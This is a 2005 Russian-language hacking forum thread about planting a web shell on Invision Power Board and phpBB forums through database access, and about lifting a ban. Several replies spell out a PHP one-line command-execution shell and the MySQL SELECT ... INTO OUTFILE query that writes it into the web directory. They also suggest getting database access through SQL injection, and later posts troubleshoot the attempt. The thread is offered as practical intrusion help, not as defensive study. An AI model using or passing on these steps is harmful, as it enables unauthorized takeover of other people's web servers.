Форумы Заливка шелла и снятие бана в ipb через mysql

Discussion in 'Уязвимости CMS/форумов' started by darks, 24 Nov 2005.

  1. darks

    darks New Member

    Joined:
    19 Nov 2005
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    Есть доступ к базе ... Возможно ли как нить залить шелл через неё ? И что нужно редактить в этой базе стобы снять бан ? Я тут попытался но у меня что то не особо получилось ... Кстати форум Ipb стоит .
     
  2. madnet

    madnet Умиротворенный

    Joined:
    9 Dec 2004
    Messages:
    868
    Likes Received:
    343
    Reputations:
    423
    Сначала заносим в БД запись нашего шела типа
    <? system($_GET(cmd)) ?>

    Потом сохраняем в файл
    SELECT blabla INTO OUTFILE 'shell.php' FROM TABLE_NAME
     
    _________________________
  3. *Van*

    *Van* Elder - Старейшина

    Joined:
    14 Aug 2005
    Messages:
    365
    Likes Received:
    19
    Reputations:
    12
    А на phpbb можно таким способом заливать шелл?
     
    1 person likes this.
  4. m0nzt3r

    m0nzt3r моня

    Joined:
    22 Jun 2004
    Messages:
    2,096
    Likes Received:
    673
    Reputations:
    591
    ну пхпББ тоже на БД работает соответсвтенно можно=)
     
  5. *Van*

    *Van* Elder - Старейшина

    Joined:
    14 Aug 2005
    Messages:
    365
    Likes Received:
    19
    Reputations:
    12
    И это будет работатьь на любых версиях?
     
  6. milord69

    milord69 New Member

    Joined:
    24 Nov 2005
    Messages:
    18
    Likes Received:
    0
    Reputations:
    0

    Обьясни плиз немного подробнее
     
  7. m0nzt3r

    m0nzt3r моня

    Joined:
    22 Jun 2004
    Messages:
    2,096
    Likes Received:
    673
    Reputations:
    591
    находишь СКУЛЬ иньекцию..или пробиваешься и достаешь доступ к базе.. и делаешь запрос с помощью которого добавляешь юзера(или еще чего то в базу) с содержанием <? system($_GET['cmd']; ?> а дальше по команде маднета
    надеюсь понятно??
    Ван, ну наверно))ведь во всех версиях есть коннект к БД =))
     
  8. milord69

    milord69 New Member

    Joined:
    24 Nov 2005
    Messages:
    18
    Likes Received:
    0
    Reputations:
    0
    Доступ есть... Но вот дальше не понял. Если можно, то подробней плиз. :)
     
  9. Rebz

    Rebz Banned

    Joined:
    8 Nov 2004
    Messages:
    4,052
    Likes Received:
    1,534
    Reputations:
    1,128
    Подробней - выучи команды SQL.
    Insert, select хотя бы. C помощью команды insert добавь юзера.
     
  10. qBiN

    qBiN Вот такой вот я :(

    Joined:
    20 Jan 2005
    Messages:
    834
    Likes Received:
    73
    Reputations:
    33
    2 ВанПрошу не флудить и по-возможности не задавать однотипные а также глупые вопросы.Так же не писать по одному вопросу в сообщении,если захотел что то добавить(незначительное) то есть кнопочка редактирования сообщения.
    Все выше перечисленное относится и к другим пользователям.
    Настчет темы добавлю к сообщению madnet'a
    SELECT `my_column` INTO OUTFILE '/path2/wwwdir/shell.php' FROM TABLE_NAME
    Подчеркнутым- полный путь к файлу.
     
  11. ..::k0rps::..

    ..::k0rps::.. New Member

    Joined:
    25 Nov 2005
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0


    Всё делаю как написано, в итоге пишет вот что:

    Access denied for user: 'viperweb_ibrd1@localhost' (Using password: YES)

    Что это такое и как с этим бароться=)?
     
  12. qBiN

    qBiN Вот такой вот я :(

    Joined:
    20 Jan 2005
    Messages:
    834
    Likes Received:
    73
    Reputations:
    33
    Те что перевести трудно??
    Не пускает под юзером viperweb_obrd1, при использовании пароля.Скорее всего неправильный пароль в скриптах.
    ВВести правильный пароль =)
     
  13. ..::k0rps::..

    ..::k0rps::.. New Member

    Joined:
    25 Nov 2005
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0

    Я в админке ИПБ 1. 3 , там есть такая функция:

    SQL Management >>> mySQL Toolbox>>>RUN QUERY

    И когда вбиваю всё что ты сказал, вылазиет эта шняга и каким образом я поменяю пароль, ты мне скажи=)
    Как можно кроме как через смайлы и мускул ещё залить шелл через этот движок?
     
  14. qBiN

    qBiN Вот такой вот я :(

    Joined:
    20 Jan 2005
    Messages:
    834
    Likes Received:
    73
    Reputations:
    33
    Я расшифровал что это такое,и в чем ошибка обычно кроется. Или не правильный юзер или пароль.
     
  15. ..::k0rps::..

    ..::k0rps::.. New Member

    Joined:
    25 Nov 2005
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    А насчёт других методов залива знаеш чёнить?
    Если да то поделись, я тебя отблагадарю=)